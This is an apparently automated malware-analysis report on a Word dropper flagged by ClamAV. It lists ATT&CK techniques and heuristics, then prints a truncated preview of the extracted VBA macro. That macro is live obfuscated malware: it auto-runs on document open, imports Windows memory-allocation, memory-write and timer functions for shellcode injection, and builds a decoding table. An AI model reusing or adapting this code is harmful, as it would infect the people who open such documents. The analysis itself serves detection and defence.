MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6406932-0'. It contains a VBA macro that is automatically executed via the Document_Open subroutine. This macro likely downloads and executes a second-stage payload, as indicated by the presence of obfuscated API calls and the general behavior associated with dropper malware. The document body content is unrelated to the malicious functionality.
Heuristics (4)
- ClamAV: Doc.Dropper.Agent-6406932-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6406932-0
- VBA macros detected [medium] (1 related finding) OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10634 bytes |

SHA-256: 7397031ab65e553e8822592f8266439a7ebd2a36c39cf66d600856926cbe5936

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim exciting As Variant
Dim selfconceit As String
megahertz = "bolivian"
alarmism = disjointed
polska.photovoltaic
mothernaked = 49 + 9
Pmt 0, mothernaked, 20765, 25222, 3
End Sub
Attribute VB_Name = "unvanquished"
Attribute VB_Base = "0{FD689C69-81CA-4FF0-9F87-E9467C8BCEB4}{4AAE84EA-211F-46FB-AFF0-55CF5223A1E6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "budapesht"
' Dont die before I do
' And I can not resist
#If (63 - 68 + 405 + 2 - 18 + 316) > ((59 - 83 + 344) - (95 - 87 + 532) * 1) And ((77 - 17 - 32) - (2 - 16 + 42)) * 2 < (Win64) Then
' Doch ich weiß dass es dich gibt
' Your love I can't dismiss
Public Declare PtrSafe Function foist _
Lib "Ntdll " Alias _
"NtAllocateVirtualMemory" (perfumatory As LongPtr, diemaker As LongPtr, ByVal carbonyl As LongPtr, gentianByVal As LongPtr, chautauqua As LongPtr, ByVal primer As LongPtr) As LongPtr
' He comes to me every night
' Es ist kalt und regungslos
Public Declare PtrSafe Function collie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (airframe As Any, ByVal parthis As Any, ByVal syria As Any, ByVal desensitized As Any, ByVal intangibility As Any, ByVal cervical As Any, ByVal bacitracin As Any) As Long
' Es ist kalt und regungslos
' I dont know who you are
Public Declare PtrSafe Function billing _
Lib "Ntdll " Alias _
"NtWriteVirtualMemory" (ByVal dobra As Any, ByVal antelope As Any, ByVal band As Any, ByVal oscines As Any, ByVal anaesthetic As Any) As LongPtr
' Ich weiß nicht wie du heißt
' I close my eyes and pass away
#End If
Function orites(cerate, beslubber, sarawak, fixer)
#If (118 - 100 + 382 + 65 - 102 + 337) > ((23 - 2 + 299) - (113 - 124 + 551) * 1) And Not ((105 - 99 + 22) - (90 - 98 + 36)) * 2 < (Win64) Then
Dim acknowledgement As Long
Dim manitoba As Long
Dim folks As Long
Dim halfprice As Long
Dim aneides As Long
#End If
#If (34 - 98 + 464 + 49 - 16 + 267) > ((79 - 117 + 358) - (48 - 58 + 550) * 1) And ((105 - 43 - 34) - (101 - 35 - 38)) * 2 < (Win64) Then
Dim manitoba As LongPtr
Dim acknowledgement As LongPtr
Dim halfprice As LongPtr
Dim folks As LongPtr
Dim aneides As LongPtr
#End If
acknowledgement = cerate
aneides = sarawak
folks = beslubber
beatnik = 48 + 22
Pmt 0, beatnik, 28582, 59814, 3
manitoba = 59 - 23 - 37
billing ByVal manitoba, acknowledgement, folks, aneides, halfprice
End Function
Attribute VB_Name = "polska"
Function bored()
Dim riot(255) As Byte
transmitter = 106 - 113 + 72
Do While transmitter <= 90 + 1
riot(transmitter) = transmitter - 65
transmitter = transmitter + 1
Loop
transmitter = 48
Do While transmitter <= 50 + 8
riot(transmitter) = transmitter + 4
transmitter = transmitter + 1
Loop
transmitter = 97
Do While transmitter <= 120 + 3
riot(transmitter) = transmitter - 71
transmitter = transmitter + 1
Loop
riot(47) = 63
transmitter = 43
riot(transmitter) = 60 + 2
bored = riot
End Function
Function photovoltaic()
Dim spectrometric As Byte
Dim dollhouse As Long
unvanquished.samarskite.Value = Day(#12/5/2013#)
varday = armillary = "intrastate"
bonnebouche = hyoscyamus
peacockblue = "horsetail"
buffoonish = "heterometabolous"
festoon = autacoid
pediatrics = "capo"
bisect = "saddled"
ladyseardrop = carousel
Set placability = unvanquished.samarskite.SelectedItem
valence = 54 + 42
Pmt 0, valence, 13418, 22341, 2
arena = placability.Name
disequilibrium = 107 - 58 + 7795
anostraca = Right(arena, disequilibrium)
tirana = sertan.racetrack(anostraca)
euglena = 32 + 28
Pmt 0, euglena, 34695, 25765, 5
gainful = "circuition"
... (truncated)